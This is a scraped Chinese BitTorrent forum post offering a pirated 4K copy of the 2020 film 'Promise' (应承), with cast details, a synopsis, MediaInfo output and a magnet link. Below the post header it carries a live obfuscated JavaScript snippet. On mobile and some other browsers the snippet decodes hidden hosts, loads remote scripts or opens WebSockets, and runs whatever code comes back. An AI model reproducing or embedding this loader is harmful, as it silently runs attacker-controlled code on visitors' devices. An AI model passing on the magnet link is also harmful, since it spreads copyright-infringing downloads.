应承[国语中字].Promise.2020.2160p.WEB-DL.H265.DDP2.0 8.92GB

版主小s 1月前 165

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 应承 / Promise
◎年  代 2020
◎产  地 中国大陆
◎类  别 剧情
◎语  言 汉语普通话
◎上映日期 2020-11-26(中国大陆)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣评分 6.5/10 (919人评价)
◎豆瓣链接 https://movie.douban.com/subject/34834769/
◎片  长 97分钟
◎导  演 王军 Jun Wang (id:1403293)
◎编  剧 倪泓 Hong Ni (id:1424731)
◎演  员 冯远征 Yuanzheng Feng (id:1043136)
       李滨 Bin Li (id:1313659)
       于非非 Feifei Yu (id:1403296)
       岳红 Hong Yue (id:1052863)
       戴玥  (id:1424732)
       雷恪生 Kesheng Lei (id:1274724)
       徐海洋  (id:1423172)
       王志平  (id:1423173)
       芦苇 Wei Lu (id:1275557)
       冯嘉龙 Jialong Feng (id:1423174)
       贾樟柯 Zhangke Jia (id:1274261)

◎标  签 冯远征 / 剧情 / 人性 / 国产电影 / 中国大陆 / 中国电影 / 李滨 / 电影

◎简  介
  《应承》讲述的是小人物践行一诺千金的感人故事。何二寡妇的养女豆儿考上了大学,她终于要和老情人许二瓜要走到一起了,车祸却击溃了他们期盼了多年的幸福,临死前,何二寡妇将豆儿托付给许二瓜,要许二瓜每月给豆儿汇五百元生活费。哪知许二瓜第一次给豆儿汇生活费,何二寡妇留给他的钱就被小偷偷得一千二净。                                    
                                为了能给豆儿顺利凑齐生活费,许二瓜靠捡破烂为生,并和邻居刘顺成为了朋友,豆儿也渐渐接纳了许二瓜,并喜欢上了帅气的刘顺,然而一次意外却让许二瓜知晓了刘顺的真实身份....

  1. ##### MediaInfo ######

  2. General

  3. Complete name                            : 应承.Prom[email protected]

  4. Format                                   : MPEG-4

  5. Format profile                           : Base Media

  6. Codec ID                                 : isom (isom/iso2/mp41)

  7. File size                                : 8.92 GiB

  8. Duration                                 : 1 h 36 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 13.2 Mb/s

  11. Writing application                      : OurTV Multimedia Platform


  12. Video

  13. ID                                       : 1

  14. Format                                   : HEVC

  15. Format/Info                              : High Efficiency Video Coding

  16. Format profile                           : [email protected]@High

  17. Codec ID                                 : hev1

  18. Codec ID/Info                            : High Efficiency Video Coding

  19. Duration                                 : 1 h 25 min

  20. Source duration                          : 1 h 25 min

  21. Bit rate                                 : 14.5 Mb/s

  22. Width                                    : 4 096 pixels

  23. Height                                   : 1 740 pixels

  24. Display aspect ratio                     : 2.35:1

  25. Original display aspect ratio            : 2.35:1

  26. Frame rate mode                          : Variable

  27. Frame rate                               : 25.000 FPS

  28. Minimum frame rate                       : 25.000 FPS

  29. Maximum frame rate                       : 90 000.000 FPS

  30. Color space                              : YUV

  31. Chroma subsampling                       : 4:2:0

  32. Bit depth                                : 8 bits

  33. Bits/(Pixel*Frame)                       : 0.081

  34. Stream size                              : 8.66 GiB (97%)

  35. Source stream size                       : 8.66 GiB (97%)

  36. mdhd_Duration                            : 5124941

  37. Codec configuration box                  : hvcC


  38. Audio #1

  39. ID                                       : 2

  40. Format                                   : E-AC-3

  41. Format/Info                              : Enhanced AC-3

  42. Commercial name                          : Dolby Digital Plus

  43. Codec ID                                 : ec-3

  44. Duration                                 : 1 h 36 min

  45. Bit rate mode                            : Constant

  46. Bit rate                                 : 256 kb/s

  47. Channel(s)                               : 2 channels

  48. Channel layout                           : L R

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 31.250 FPS (1536 SPF)

  51. Compression mode                         : Lossy

  52. Stream size                              : 177 MiB (2%)

  53. Title                                    : 国语DDP5.1

  54. Language                                 : Chinese

  55. Service kind                             : Complete Main

  56. Default                                  : Yes

  57. Alternate group                          : 1


  58. Audio #2

  59. ID                                       : 3

  60. Format                                   : AAC LC

  61. Format/Info                              : Advanced Audio Codec Low Complexity

  62. Codec ID                                 : mp4a-40-2

  63. Duration                                 : 1 h 25 min

  64. Bit rate mode                            : Variable

  65. Bit rate                                 : 125 kb/s

  66. Maximum bit rate                         : 129 kb/s / 129 kb/s

  67. Channel(s)                               : 2 channels

  68. Channel layout                           : L R

  69. Sampling rate                            : 48.0 kHz

  70. Frame rate                               : 46.875 FPS (1024 SPF)

  71. Compression mode                         : Lossy

  72. Stream size                              : 76.6 MiB (1%)

  73. Title                                    : 国语AAC2.0

  74. Language                                 : Chinese

  75. Default                                  : No

  76. Alternate group                          : 1



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:2BC4EACD79BAFE5A44D5C763B82707D439864452
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回